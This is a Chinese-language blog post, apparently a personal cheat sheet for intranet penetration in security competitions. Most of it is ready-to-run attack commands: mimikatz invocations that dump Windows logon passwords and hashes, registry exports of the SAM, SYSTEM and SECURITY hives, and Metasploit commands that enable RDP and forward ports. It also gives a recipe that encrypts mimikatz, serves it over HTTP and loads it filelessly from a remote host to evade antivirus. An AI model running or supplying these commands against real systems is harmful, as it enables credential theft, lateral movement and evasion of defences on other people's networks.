内网渗透记录

前言

随着在大型比赛中内网越来越重要,打内网的机会越来越多,在此记录一些常用的内网渗透技巧/命令/工具,省的每次用都要去搜,机会是留给有准备的人的,你准备的越充分,机会到来的时候,你就越不会慌张。

正文

在Windows环境中抓密码

工具

  • 搞安全谁不知道这个工具mimikatz

  • 微软官方的工具,带数字签名,有一定的免杀效果但不多procdump

  • SqlDumper,默认存放在C:FilesSQL Server,number代表SQL Server的版本。

  • powershell脚本Invoke-Mimikatz

  • 之前能过卡巴斯基dump lsass的工具xpn

使用命令

  • mimikatz 交互模式
    1
    2
    privilege::debug
    sekurlsa::logonpasswords

一句话模式

1
mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit

配合sam和system文件,文件位置C:,默认情况下由于文件占用无法复制出来,可以使用以下命令保存。火绒居然不拦截,果然装火绒就是图一乐。

1
2
reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv
1
mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit

msf开启rdp和端口转发

1
2
run post/windows/manage/enable_rdp
portfwd add -l 13389 -r 192.168.1.9 -p 3389

通用免杀

链接:https://github.com/TheD1rkMtr/FilelessPELoader

简易教程

server

1
2
3
4
5
6
7
8
9
git clone https://github.com/TheD1rkMtr/FilelessPELoader
cd FilelessPELoader
rm mimikatz.exe
wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip
7z x mimikatz_trunk.zip
mv x64/mimikatz.exe .
python3 aes.py mimikatz.exe
## 启动http 服务
python3 -m http.server

client

1
cl /EHsc FilelessPELoader.cpp

或者使用Visual Studio 2022编译

使用

1
FilelessPELoader.exe 10.0.0.114 8000 cipher.bin key.bin

借用项目的图

通过sam system文件提取hash

使用注册表导出

1
2
3
reg save HKLM\SAM sam.hiv
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SECURITY security.hiv

在pe模式下可以直接从C:

用mimikatz提取hash

1
2
mimikatz.exe 
lsadump::sam /sam:sam.hiv /system:system.hiv

mimikatz免杀

参考链接

  • https://www.freebuf.com/articles/web/231880.html
  • https://github.com/PowerShellMafia/PowerSploit
  • https://ssooking.github.io/2020/07/mimikatz%E6%8A%93%E5%8F%96%E6%98%8E%E6%96%87%E5%AF%86%E7%A0%81/
  • https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87SAM%E6%95%B0%E6%8D%AE%E5%BA%93%E8%8E%B7%E5%BE%97%E6%9C%AC%E5%9C%B0%E7%94%A8%E6%88%B7hash

内网渗透记录
https://blog.njcit.me/2023/01/18/内网/内网渗透记录/
作者
ccadmin
发布于
2023年1月18日
许可协议